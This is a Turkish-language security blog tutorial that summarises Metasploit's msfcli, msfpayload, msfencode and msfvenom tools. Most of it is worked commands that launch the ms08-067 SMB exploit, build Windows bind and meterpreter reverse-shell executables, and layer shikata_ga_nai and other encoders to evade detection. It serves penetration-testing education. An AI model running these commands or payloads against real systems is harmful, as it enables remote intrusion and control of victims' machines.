Metasploit Detay Bilgiler (Özet)

Bu makalede metasploit hakkında bir önceki makalede paylaşılmış bilgilerin özeti yer almaktadır. Bu makalenin ilintili olduğu konu zinciri aşağıda verilmiştir:

[*]	Bu belgede bahsedilecek komutlar Kali 1.0.4 ve Kali 2018.1’ de test edilmiştir ve sorunsuz çalıştırılmışlardır.

Aşağıda msfcli, msfpayload, msfencode ve msfvenom'un kullanımı verilmiştir.

a. Msfcli

Kullanım Dizilişi (Syntax’ı)

msfcli  [Exploitadi]  [Option=value]  [Mode]

msfcli komutun adı, exploitadi kısmına msfconsole'da girdiğiniz exploit yolu ve ismi, option=value kısmına seçilen modülün parametre ve değerleri, son olarak da mode kısmına bu girilecek komut için uygulanacak nihai aksiyon gelir.

Msfcli Modlar

Mod              	Yaptığı İş
-------------     	-------------------
(H)elp              	Yardım menüsünün görüntülenmesini sağlar.
(S)ummary           	Belirtilen exploit hakkında detaylı bilgi 
                    	verir (Msfconsole'daki info'dur).
(O)ptions           	Belirtilen exploit'in set edilecek 
                        değişkenlerini sunar. (Msfconsole'daki show 
                        options) 
(A)dvanced          	Berlitilen exploit için ilgili tüm değişkenleri 
                    	sunar. (Msfconsole'daki show advanced)
(I)DS Evasion       	IDS'lere yakalanmamak için ayarlanabilecek 
                    	değişkenleri sunar.
(P)ayloads          	Belirtilen exploit'le uyumlu tüm payload'ları 
                    	sunar.
(T)argets           	Berlitilen exploit'in işe yaradığı işletim 
                    	sistemlerini sunar.
(AC)tions           	Berlirtilen exploit ile kullanılabilecek 
                    	auxiliary'leri sunar.
(C)heck             	Belirtilen exploit'in hedef sistemde işe 
                        yarayıp yaramayacağını tespit eder.
(E)xecute           	Belirtilen exploit'i çalıştırır.

Kullanımı

# Seçilen modül için show (o)ptions yapılır
msfcli exploit/windows/smb/ms08_067_netapi RHOST=X.X.X.X RPORT=445 
PAYLOAD=windows/meterpreter/bind_tcp LHOST=Y.Y.Y.Y O   // (O)ptions

# Seçilen modül çalıştırılır.
msfcli exploit/windows/smb/ms08_067_netapi RHOST=X.X.X.X RPORT=445 
PAYLOAD=windows/meterpreter/bind_tcp LHOST=Y.Y.Y.Y E   // (E)xecute

Msfcli Hk.

Artık msfconsole tool’u ile de tek satırda bu işlemler yapılabilmektedir. msfconsole’a -x parametresi ile eklenecek msfconsole komutları (örn; use, set, exploit gibi…) tek satır halinde girilebilir ve sonuca ulaşabiliriz.

# Seçilen modül için show (o)ptions yapılır.
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 
172.16.3.120; set RPORT 445; set PAYLOAD windows/meterpreter/bind_tcp;
set LHOST 172.16.3.73; show options"

# Seçilen modül çalıştırılır.
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 
172.16.3.120; set RPORT 445; set PAYLOAD windows/meterpreter/bind_tcp; 
set LHOST 172.16.3.73; exploit"

Uyarı

Msfcli tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfcli" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfcli ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerde bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018

cd /usr/share/framework2/
./msfcli -h

b. Msfpayload

Kullanım Dizilişi (Syntax’ı)

msfpayload  [Options]  [Payload]   [Parametre=arguman]  [CiktiFormati]

msfpayload komutun adı, options msfpayload’un tool parametre ve argumanlarını (örn; -h (yani help), -l (yani payload’ları listelemeye yarayan list) gibi), payload payload'un ismini, parametre=arguman seçilen payload'un parametre ve atanacak değerlerini, ciktiFormati ise payload'un hangi dilde wrap edilerek (etraflıca sarılarak) çıktılanacağını belirtir.

Msfpayload Çıktı Formatları

Çıktı Format          	        Msfpayload'a Konulacak Harfi
--------------------    	----------------------------
[O]ptions               	O
[C] Dili                	C
Cs[H]arp Dili           	H
[P]erl Dili             	P
Ruby[Y] Dili            	Y
[R]aw (Ham) Hal                 R
[J]avascript Dili       	J
e[X]e Hali              	X
[D]ll Hali              	D
[V]isual Basic Dili             V
[W]ar Hali              	W
Pytho[N] Dili           	N

Kullanımı

# Metasploit payload’ları sıralanır.
msfpayload -l

# Seçilen modülün seçenekleri sıralanır.
msfpayload windows/shell_bind_tcp O      	// (O)ptions

# Seçilen payload’un seçeneklerine verilen değerler nedeniyle 
# seçenekler teyit amaçlı tekrar sıralanır. 
msfpayload windows/shell_bind_tcp  EXITFUNC=thread LPORT=1234
RHOST=222.168.33.41 O     			// (O)ptions

# Seçilen payload modülü çıktılanır.
msfpayload windows/shell_bind_tcp EXITFUNC=thread LPORT=1234 
RHOST=222.168.33.41 X > payload.exe   		//  e[X]e çıktı formatıdır.

Uyarı

Msfpayload tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfpayload" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfpayload ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerden bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018

cd /usr/share/framework2/
./msfpayload -h

c. Msfencode

Kullanım Dizilişi (Syntax'ı) :

msfencode  [Options]

msfencode komutun adı, options msfencode'un tool parametre ve değerlerini alır.

Msfencode Seçenekleri

-e	: encoding ismi
-t	: çıktı formatı
-o	: çıktı dosyası ismi
-c	: count (iterasyon) sayısı

Kullanımı

# Encoding tekniklerini sıralar.
msfencode -l

# Çıktılanan payload encode’lanır.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -t exe -o /root/Desktop/payload.exe

# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem I]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R  | msfencode -e x86/shikata_ga_nai -t raw | msfencode -e 
x86/shikata_ga_nai -t raw | msfencode -e x86/shikata_ga_nai -t raw | 
msfencode -e x86/shikata_ga_nai -t exe -o payload.exe

# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem II]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe

# Çıktılanan payload farklı farklı encoding teknikleriyle encode’lanır.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -t raw | msfencode -e 
x86/alpha_upper -t raw | msfencode -e x86/shikata_ga_nai -t raw | 
msfencode -e x86/countdown -t exe -o payload.exe

# Çıktılanan payload farklı farklı encoding teknikleriyle her biri 
# için birden fazla kez encode’lamaya tabi tutulur.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.2 LPORT=4443
R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e 
x86/alpha_upper -c 3 -t raw | 	msfencode -e x86/shikata_ga_nai -c 4 -t
raw | msfencode -e x86/countdown -c 2 -t exe -o payload.exe

Uyarı

Msfencode tool’u deprecated olduğu için yeni Kali’lerde aslında kullanılmamaktadır. Ancak yeni Kali’lerde yapılan find / -name "msfencode" araması sonucunda /usr/share/framework2/ dizini altında deprecated olmuş msfencode ve diğer metasploit framework yan tool’larının yer aldığı görülebilir. Dilenirse yeni Kali’lerden bu desteği çekilmiş tool’lar belirtilen dizin altından kullanılabilir. Fakat eski Kali’lerdeki gibi stabil çalışmayabilir. Çünkü bağımlı olduğu metasploit framework yeni Kali’lerde daha güncel durumdadır. Örn;

Kali 2018

cd /usr/share/framework2/
./msfencode -h

d. Msfvenom

Kullanım Dizilişi (Syntax’ı)

msfvenom  [Options]  [Parametre=arguman]   [CiktiFormati]

msfvenom komutun adı, options msfvenom’un tool parametrelerini, parametre=arguman seçilen modülün parametreleri ve değerlerini, ciktiFormati ise payload’un son halinin hangi formatta olacağı bilgisini alır.

Kullanımı

# Metasploit Framework payload’larını, encoder’larını ve 
# NOP’larını sıralar.
msfvenom -l

# Metasploit Framework payload’larını sıralar.
msfvenom -l payloads

# Metasploit Framework encoder’larını sıralar.
msfvenom -l encoders

# Metasploit Framework NOP’larını sıralar.
msfvenom -l nops

i) Msfvenom ile Payload Oluşturma

# Seçilen payload’un seçenekleri sıralanır.
msfvenom -p windows/shell_bind_tcp --payload-options

(( Not: Eski kali’lerde --payload-options yerine -o kullanılmaktadır.))
(( Örn; msfvenom -p windows/shell_bind_tcp -o ))

# Seçilen payload’un seçeneklerine verilen değerler nedeniyle 
# seçenekler teyit amaçlı tekrar sıralanır. [Not: Atanan değerleri
# gösterme özelliği henüz desteklenmemektedir]
msfvenom -p windows/shell_bind_tcp  EXITFUNC=thread LPORT=1234 
RHOST=222.168.33.41 --payload-options

(( not: Eski kali’lerde --payload-options yerine -o kullanılmaktadır.))
(( Örn; msfvenom -p windows/shell_bind_tcp -o ))

# Seçilen payload’un çıktısı alınır.
msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 
RHOST=222.168.33.41 -f exe -o payload.exe

ii) Msfvenom ile Encode’lama

# Çıktılanan payload encode’lanır.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe -o
payload.exe

# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem I]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -f exe -o 
payload.exe

# Çıktılanan payload birden fazla kez aynı encode’lamaya 
# tabi tutulur. [Yöntem II]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 4 -f exe 
-o payload.exe

# Çıktılanan payload farklı farklı encoding teknikleriyle 
# encode’lanır.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -f exe | 
msfvenom -a x86 --platform windows -e x86/countdown -f exe | msfvenom 
-a x86 --platform windows -e x86/shikata_ga_nai -f exe | msfvenom -a 
x86 --platform windows -e cmd/echo -f exe -o payload.exe

# Çıktılanan payload farklı farklı encoding teknikleriyle 
# her biri için birden fazla kez encode’lamaya tabi tutulur.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.18 
LPORT=1234 -a x86 --platform windows -e x86/shikata_ga_nai -i 4 -f exe
| msfvenom -a x86 --platform windows -e x86/countdown -i 2 -f exe | 
msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 5 -f exe | 
msfvenom -a x86 --platform windows -e cmd/echo -i 3 -f exe -o 
payload.exe

Bu özet niteliğindeki makaleyle metasploit konu zinciri tamamlanmış bulunmaktadır. Aklınıza takılan, uğraşıp da yapamadığınız soruları burada yorum olarak paylaşabilirsiniz. İyi çalışmalar.

Bu yazı 16.11.2018 tarihinde, saat 09:47:53'de yazılmıştır. 01.04.2019 tarihi ve 18:53:05 saatinde ise güncellenmiştir.

Yazar : Hasan Fatih ŞİMŞEK

Görüntülenme Sayısı : 2282

Yorumlar

Henüz yorum girilmemiştir.

Yorum Ekle

	#Kategoriler
	->	Genel
	->	Webgoat Uygulaması
	->	DVWA Uygulaması
	->	Çeşitli Sızma Teknikleri
	->	Güvenlik Araçları
	->	Linux Temelleri
	->	Genel Kültür (Siber Güvenlik)

#Popüler Yazılar
	->	Faz Açısını Hesaplama
	->	Hub, Switch, Router, Modem, Gateway ve Access Point Farkları
	->	Ders 12 - Ajax Security > DOM-Based cross-site scripting
	->	GET ile POST Arasındaki Fark
	->	BGA Sınav Soruları 2016

#En Son Yazılar
	->	Apache Web Sunucuyu Yurt Dışı (Türkiye Dışı) Trafiğe Kapama
	->	Siber Güvenlikte Düşük Seviye Açıklık Nedir
	->	Haberleşme Teknolojisi
	->	Oyun Motoru Nedir
	->	Arp Spoofing İlave Uygulamalar

#Arşiv
	► 2014 ► Ekim (1) • Blog Maceram Başlar ► Kasım (7) • Parazit ve Gürültü Arasındaki Fark Nedir? • Stack ve Heap Arasındaki Fark • Sinyal Denkleminin Anlamı • Periyot ve Frekans Nedir? • Faz Açısını Hesaplama • Üniversite Öğrencilerinin Sağlık Aktivasyonu • Nesne Yönelimli Programlama Nedir ► Aralık (3) • Skype'ta Birbirimizin Sesini Nasıl Duyuyoruz? • Hub, Switch, Router, Modem, Gateway ve Access Point Farkları • Askerlikle İlgili Sorular ► 2015 ► Ocak (1) • Dev Firmaların Mülakatlarda Sorduğu 15 Çetin Soru ► Şubat (4) • Yapay Zeka İnsanı Geçemez • Webgoat Nedir? • Ubuntu 14.04 LTS Linux'a Webgoat Kurulumu • Windows'a Webgoat Kurulumu ► Mart (1) • Ders 1 - Introduction(Giriş) ► Nisan (3) • Ders 2 - General > Http Basics • Ders 3 - General > Http Split • Ders 4 - Access Control Flaws > Using an Access Control Matrix ► Mayıs (7) • Ders 5 - Access Control Flaws > Bypass a Path Based Access Control Scheme • Ders 6 - Role Based Access Control > Stage 1 • Ders 7 - Role Based Access Control > Stage 2 • Ders 8 - Role Based Access Control > Stage 3 • Ders 9 - Role Based Access Control > Stage 4 • Ders 10 - Access Control Flaws > Remote Admin Access • Ders 11 - Ajax Security > Same Origin Policy Protection ► Haziran (4) • Ders 12 - Ajax Security > DOM-Based cross-site scripting • Ders 13 - Ajax Security > Client Side Filtering • GET ile POST Arasındaki Fark • Ders 14 - Ajax Security > DOM Injection ► Temmuz (7) • Ders 15 - Ajax Security > XML Injection • Ders 16 - Ajax Security > JSON Injection • Ders 17 - Ajax Security > Silent Transactions Attacks • UML Sınıf Diyagramları • UML Sınıf Diyagramı İlişkileri • Association vs. Aggregation vs. Composition • Ders 18 - Ajax Security > Dangerous Use of Eval ► Ağustos (2) • Ders 19 - Ajax Security > Insecure Client Storage • Ders 20 - Authentication Flaws > Password Strength ► Eylül (11) • Ders 21 - Authentication Flaws > Forgot Password • Ders 22 - Authentication Flaws > Basic Authentication • Ders 23 - Authentication Flaws > Multi Level Login 1 • Ders 24 - Authentication Flaws > Multi Level Login 2 • Ders 25 - Buffer Overflows > Off-by-One Overflows • Ders 26 - Code Quality > Discover Clues in the HTML • Ders 27 - Concurrency > Thread Safety Problems • Ders 28 - Concurrency > Shopping Cart Concurrency Flaw • Ders 29 - Cross-Site Scripting (XSS) > Phishing with XSS • Ders 30 - Cross-Site Scripting (XSS) > Stage 1: Stored XSS • Ders 31 - Cross-Site Scripting > Stage 2: Block Stored XSS using Input Validation ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2016 ► Ocak (27) • DVWA Nedir? • Windows'a DVWA Kurulumu • Ubuntu 14.04 LTS Linux'a DVWA Kurulumu • Ders 1 - DVWA'ya Giriş • Ders 2 - Brute Force (Low Level) • Ders 3 - Brute Force (Medium Level) • Ders 4 - Command Injection (Low Level) • Ders 5 - Command Injection (Medium Level) • Ders 6 - Command Injection (High Level) • Ders 7 - Cross Site Request Forgery (Low Level) • Ders 8 - File Inclusion (Low Level) • Ders 9 - File Inclusion (Medium Level) • Ders 10 - File Inclusion (High Level) • Ders 11 - File Upload (Low Level) • Ders 12 - File Upload (Medium Level) • Ders 13 - File Upload (High Level) • Ders 14 - SQL Injection (Low Level) • Ders 15 - SQL Injection (Low Level) II • Ders 16 - SQL Injection (Medium Level) • Ders 17 - Blind SQL Injection (Low Level) • BGA Sınav Soruları 2016 • Ders 18 - Blind SQL Injection (Medium Level) • Ders 19 - Reflected XSS (Low Level) • Ders 20 - Reflected XSS (Medium Level) • Ders 21 - Reflected XSS (High Level) • Ders 22 - Stored XSS (Low Level) • Ders 23 - Stored XSS (Medium Level) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2017 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2018 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (1) • Ve Blog'a Döndüm ► Ekim (0) ► Kasım (6) • Metasploit Framework'e Giriş • Metasploit ile Bir Sızma Uygulaması (ms08-067) • Metasploit Saldırı Aşamaları (Özet) • Metasploit Komutları • Metasploit Detay Bilgiler • Metasploit Detay Bilgiler (Özet) ► Aralık (0) ► 2019 ► Ocak (0) ► Şubat (0) ► Mart (2) • Arp Spoofing Saldırısı Nedir ve Nasıl Yapılır • Arp Spoofing İlave Uygulamalar ► Nisan (0) ► Mayıs (0) ► Haziran (1) • Oyun Motoru Nedir ► Temmuz (1) • Haberleşme Teknolojisi ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2020 ► Ocak (1) • Siber Güvenlikte Düşük Seviye Açıklık Nedir ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2021 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (0) ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2022 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (0) ► Temmuz (0) ► Ağustos (1) • Apache Web Sunucuyu Yurt Dışı (Türkiye Dışı) Trafiğe Kapama ► Eylül (0) ► Ekim (0) ► Kasım (0) ► Aralık (0) ► 2023 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ▼ 2024

#Giriş

	ID	:
	Şifre	: